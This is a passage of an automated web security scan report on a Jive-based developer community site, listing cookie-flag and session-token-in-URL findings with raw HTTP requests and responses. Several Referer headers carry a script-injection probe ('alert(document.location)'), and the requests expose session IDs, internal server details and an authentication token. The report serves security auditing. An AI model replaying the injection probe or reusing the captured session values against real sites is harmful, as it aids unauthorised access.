User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.221. https://www.x.com/people/sebastian.kopp@wooga.com

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.222. https://www.x.com/people/skier

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3. Session token in URL

There are 56 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. https://www.x.com/images/transparent.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /images/transparent.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/transparent.png;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:19 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:40:21 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=703 t=1313157139457601
Content-Length: 100
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


3.2. https://www.x.com/index.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /index.jspa

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index.jspa HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=81298 t=1313114364510678
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 33122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</a> or <a href="https://www.x.com/login.jspa;jsessionid=C5B183263B3F02ED7C066088CE4D527D.node0?flowType=Signup">Register</a>
...[SNIP]...

3.3. https://www.x.com/login.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /login.jspa

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /login.jspa;jsessionid=C5B183263B3F02ED7C066088CE4D527D.node0?flowType=Signup HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 12 Aug 2011 13:53:45 GMT
Server: Apache-Coyote/1.1
Location: https://www.paypal.com/cgi-bin/webscr?cmd=_account-authenticate-login&RequestFromPortal=true&token=HA-DD2JDQKXPXNFG
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Vary: User-Agent
JP: D=7156 t=1313157225523734
Cache-Control: no-cache, private
Connection: close


3.4. https://www.x.com/people/Bill_at_Repaid.com/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Bill_at_Repaid.com/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Bill_at_Repaid.com/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9807 t=1313157144371655
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.5. https://www.x.com/people/DaveLeWave/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/DaveLeWave/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/DaveLeWave/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=6964 t=1313157136764283
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.6. https://www.x.com/people/Jareth_2005/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Jareth_2005/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Jareth_2005/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10461 t=1313157137312841
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.7. https://www.x.com/people/Maxatnes/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Maxatnes/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Maxatnes/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7800 t=1313157136922093
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.8. https://www.x.com/people/Murugesh_cit/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Murugesh_cit/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Murugesh_cit/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9205 t=1313157136915496
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.9. https://www.x.com/people/NetGuy/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/NetGuy/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/NetGuy/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=14657 t=1313158266056768
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.10. https://www.x.com/people/PP_MTS_Chad/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/PP_MTS_Chad/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1249 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Tue, 02 Mar 2010 21:30:22 GMT
Etag: "1249"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8308 t=1313158266078257
Keep-Alive: timeout=5, max=55
Connection: Keep-Alive
Content-Length: 6035

...[SNIP]...

3.11. https://www.x.com/people/PP_MTS_Magarvin/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/PP_MTS_Magarvin/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1014 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:04 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1014"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8565 t=1313158264488096
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive
Content-Length: 3347

...[SNIP]...

3.12. https://www.x.com/people/Saveby/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Saveby/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Saveby/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7564 t=1313157137058073
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.13. https://www.x.com/people/TrainingPal/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/TrainingPal/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/TrainingPal/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9158 t=1313157142670558
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.14. https://www.x.com/people/WebBusinessDeveloper/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/WebBusinessDeveloper/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/WebBusinessDeveloper/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11384 t=1313157143975147
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.15. https://www.x.com/people/advance-software/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/advance-software/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/advance-software/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1288 HTTP/1.1
Host: www.x.com
